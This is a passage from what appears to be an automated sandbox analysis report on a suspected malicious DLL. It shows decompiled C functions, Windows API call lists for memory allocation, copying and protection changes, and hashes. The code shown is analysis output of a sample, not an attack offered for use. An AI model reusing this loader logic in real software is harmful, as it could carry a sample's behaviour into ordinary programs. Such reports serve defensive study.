                                                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E2017EC), ref: 6E20168B
                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E2016A6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                              • String ID: Mar 26 2021
                                                                                                                                                                                                                                                              • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                              • Opcode ID: dd859902b2a75f8948b4c6af869a88d54986826870b9f876fd2974cc00eb76c2
                                                                                                                                                                                                                                                              • Instruction ID: 4a82fa74dcbc3908fe8b5cbcfcbf5738aa89817352c5aeabbfea529264681777
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd859902b2a75f8948b4c6af869a88d54986826870b9f876fd2974cc00eb76c2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5315071E0060E9FDB01CF99CC84ADEB7BABF49308F148129D504A7285D771AA4ACF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                                              			E6E201D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                              				long _t3;
                                                                                                                                                                                                                                                              				int _t4;
                                                                                                                                                                                                                                                              				int _t9;
                                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                                              					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t4 = E6E2017A7(_a4); // executed
                                                                                                                                                                                                                                                              				_t9 = _t4;
                                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                                              					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                              				return _t9;
                                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                                              0x6e201d3b
                                                                                                                                                                                                                                                              0x6e201d40
                                                                                                                                                                                                                                                              0x6e201d4e
                                                                                                                                                                                                                                                              0x6e201d53
                                                                                                                                                                                                                                                              0x6e201d53
                                                                                                                                                                                                                                                              0x6e201d59
                                                                                                                                                                                                                                                              0x6e201d5e
                                                                                                                                                                                                                                                              0x6e201d62
                                                                                                                                                                                                                                                              0x6e201d66
                                                                                                                                                                                                                                                              0x6e201d66
                                                                                                                                                                                                                                                              0x6e201d70
                                                                                                                                                                                                                                                              0x6e201d79

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 6E201D35
                                                                                                                                                                                                                                                              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E201D40
                                                                                                                                                                                                                                                              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E201D53
                                                                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E201D66
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452675757-0
                                                                                                                                                                                                                                                              • Opcode ID: ebca0716c880788973b5e29ca03ffb6befa8e3f2a5714a0beca9e4ed7bfc4bf1
                                                                                                                                                                                                                                                              • Instruction ID: 13e8736f14f54a9ed84a39fd23d4a5d03d39ad35bd8189f5dca93fd2d6991112
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebca0716c880788973b5e29ca03ffb6befa8e3f2a5714a0beca9e4ed7bfc4bf1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFE092313167152BD7022A694C8CEABBB5FEF933367010339F524D21D0DB948D4AC5B5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6E251D07
                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E251D75
                                                                                                                                                                                                                                                                • Part of subcall function 6E251C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E24F667,00000000,00000001,6E24F5F6,6E253EDB,?,6E24F667,?,00000000,?,6E253C4A,0000FDE9,00000000,?), ref: 6E251CBC
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D6C4: RtlAllocateHeap.NTDLL(00000000,00000001,6E280094), ref: 6E24D6F6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E251D66
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2560199156-0
                                                                                                                                                                                                                                                              • Opcode ID: fd60517f1e7532b1c021725e97bea6c51af69339db10d1a84b49fac85110ad32
                                                                                                                                                                                                                                                              • Instruction ID: 2b69cbccbdc97b729bc0c2590571de5bd6e455aca87499bc479de42313f5c61f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd60517f1e7532b1c021725e97bea6c51af69339db10d1a84b49fac85110ad32
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9101D4A2A02E1A7B67614FFA0F88CBF2A6FCEC3D953000928BD14C2300EB51CC9585B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2435B3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction ID: 9e621d7e490cae96721b55ff86c8e64f1fb65524c23add39a7f6dafa8c3cfb7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3711571902669CFEB08CF6DC498FAA7BE7BB57311F14415AE494C7381E2749A0CDBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E250978: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2509B9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252FBC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                                                                                              • Opcode ID: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                              • Instruction ID: 19001bb405a81033dcf205f635ce0e36f08974bfcd7d1d1abaa2b16f34c52d6a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7804acc5ac8e76e4e277d302aae37f77a1a99be9d03590c493c00d748cf0a8c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C01DBB360431A9BD3218F98D8849CAFBA9EB063B4F550A19E555B77C0D7706810CBA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2509B9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction ID: 8aa9aa82f3e41d2da4603ccd25f63f87c821ec4ea9052e358124c3257df15ba9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08F02B31A0562EDBFB014BE28E08F4B375FBF82F79B008011A814A628CEB20D46085A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000001,6E280094), ref: 6E24D6F6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 13e741d83964a02726c5f515d29017834e735980775f12ef269c2585791de6a8
                                                                                                                                                                                                                                                              • Instruction ID: 5e0974b5b6cf7d3741742e2a929ec37cc871c6e40acd22bb2374f48c4546d5ad
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13e741d83964a02726c5f515d29017834e735980775f12ef269c2585791de6a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CE0E52620062FEBEB5A1BE6DC15F8B375FEF437A1F414111ED29961C0CB20C8008DB1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E202485(long _a4) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                                                                              				short* _v32;
                                                                                                                                                                                                                                                              				void _v36;
                                                                                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                                              				signed int* _t68;
                                                                                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                                                                                              				void _t80;
                                                                                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                                                                              				short* _t87;
                                                                                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                                                                                              				signed int* _t90;
                                                                                                                                                                                                                                                              				long _t91;
                                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                                              				signed int _t94;
                                                                                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                                                                                              				signed int _t102;
                                                                                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                                                                                              				long _t108;
                                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t108 = _a4;
                                                                                                                                                                                                                                                              				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                              				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                              				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                              				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                              					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                              					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                              					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                                              						_a4 = 0;
                                                                                                                                                                                                                                                              						_t57 = _t76;
                                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                                              							_t80 =  *_t57;
                                                                                                                                                                                                                                                              							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                              							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                              							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                                              								_t63 = 0;
                                                                                                                                                                                                                                                              								L60:
                                                                                                                                                                                                                                                              								return _t63;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                                              							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                              							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                              								_t12 =  &_a4;
                                                                                                                                                                                                                                                              								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                              								__eflags =  *_t12;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                              							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                              							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                              						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                                              							L15:
                                                                                                                                                                                                                                                              							_t81 =  *0x6e2041f8;
                                                                                                                                                                                                                                                              							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                              							_t58 = 0;
                                                                                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                                                                                              							if(_t81 <= 0) {
                                                                                                                                                                                                                                                              								L18:
                                                                                                                                                                                                                                                              								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                              								__eflags = _t61;
                                                                                                                                                                                                                                                              								if(_t61 < 0) {
                                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									_t62 = _a4;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								__eflags = _t62;
                                                                                                                                                                                                                                                              								if(_t62 == 0) {
                                                                                                                                                                                                                                                              									L59:
                                                                                                                                                                                                                                                              									_t63 = _t104;
                                                                                                                                                                                                                                                              									goto L60;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                              									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                              									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                              										L46:
                                                                                                                                                                                                                                                              										_t63 = 1;
                                                                                                                                                                                                                                                              										 *0x6e204240 = 1;
                                                                                                                                                                                                                                                              										__eflags =  *0x6e204240;
                                                                                                                                                                                                                                                              										if( *0x6e204240 != 0) {
                                                                                                                                                                                                                                                              											goto L60;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										_t84 =  *0x6e2041f8;
                                                                                                                                                                                                                                                              										__eflags = _t84;
                                                                                                                                                                                                                                                              										_t93 = _t84;
                                                                                                                                                                                                                                                              										if(_t84 <= 0) {
                                                                                                                                                                                                                                                              											L51:
                                                                                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                                                                                              											if(_t93 != 0) {
                                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                                              												 *0x6e204240 = 0;
                                                                                                                                                                                                                                                              												goto L5;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t77 = 0xf;
                                                                                                                                                                                                                                                              											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                              											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                              												_t77 = _t84;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t94 = 0;
                                                                                                                                                                                                                                                              											__eflags = _t77;
                                                                                                                                                                                                                                                              											if(_t77 < 0) {
                                                                                                                                                                                                                                                              												L56:
                                                                                                                                                                                                                                                              												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                              												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                              													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                              													__eflags = _t86;
                                                                                                                                                                                                                                                              													 *0x6e2041f8 = _t86;
                                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                                              												do {
                                                                                                                                                                                                                                                              													_t68 = 0x6e204200 + _t94 * 4;
                                                                                                                                                                                                                                                              													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                              													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                              													 *_t68 = _t110;
                                                                                                                                                                                                                                                              													_t110 =  *_t68;
                                                                                                                                                                                                                                                              												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										_t69 = 0x6e2041fc + _t84 * 4;
                                                                                                                                                                                                                                                              										while(1) {
                                                                                                                                                                                                                                                              											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                              											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                              												goto L51;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                              											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                                                                                              											if(_t93 > 0) {
                                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              											goto L51;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										goto L51;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t87 = _v32;
                                                                                                                                                                                                                                                              									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                              									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                              									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                              									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                              									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                              									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                              									if(_t78 < _t72) {
                                                                                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                              										goto L20;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              								if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                              								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                              								if(_t58 < _t81) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(_t58 <= 0) {
                                                                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							 *0x6e204240 = 1;
                                                                                                                                                                                                                                                              							__eflags =  *0x6e204240;
                                                                                                                                                                                                                                                              							if( *0x6e204240 != 0) {
                                                                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              							if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                                              								_t100 = 0;
                                                                                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                                                                                              								if(_t58 < 0) {
                                                                                                                                                                                                                                                              									L34:
                                                                                                                                                                                                                                                              									 *0x6e204240 = 0;
                                                                                                                                                                                                                                                              									goto L5;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                                              									L33:
                                                                                                                                                                                                                                                              									_t90 = 0x6e204200 + _t100 * 4;
                                                                                                                                                                                                                                                              									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                              									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                              									 *_t90 = _t110;
                                                                                                                                                                                                                                                              									_t110 =  *_t90;
                                                                                                                                                                                                                                                              								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(_t58 < 0) {
                                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                                              								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                              								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                              									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                              									__eflags = _t81;
                                                                                                                                                                                                                                                              									 *0x6e2041f8 = _t81;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								L25:
                                                                                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              								if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                                                                                              								if(_t58 >= 0) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                              						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                              						if(_t75 < _v8) {
                                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                              						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                                              					goto L60;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}




































                                                                                                                                                                                                                                                              0x6e20248f
                                                                                                                                                                                                                                                              0x6e202492
                                                                                                                                                                                                                                                              0x6e202498
                                                                                                                                                                                                                                                              0x6e2024b6
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024b6
                                                                                                                                                                                                                                                              0x6e2024a0
                                                                                                                                                                                                                                                              0x6e2024a9
                                                                                                                                                                                                                                                              0x6e2024af
                                                                                                                                                                                                                                                              0x6e2024be
                                                                                                                                                                                                                                                              0x6e2024c1
                                                                                                                                                                                                                                                              0x6e2024c4
                                                                                                                                                                                                                                                              0x6e2024ce
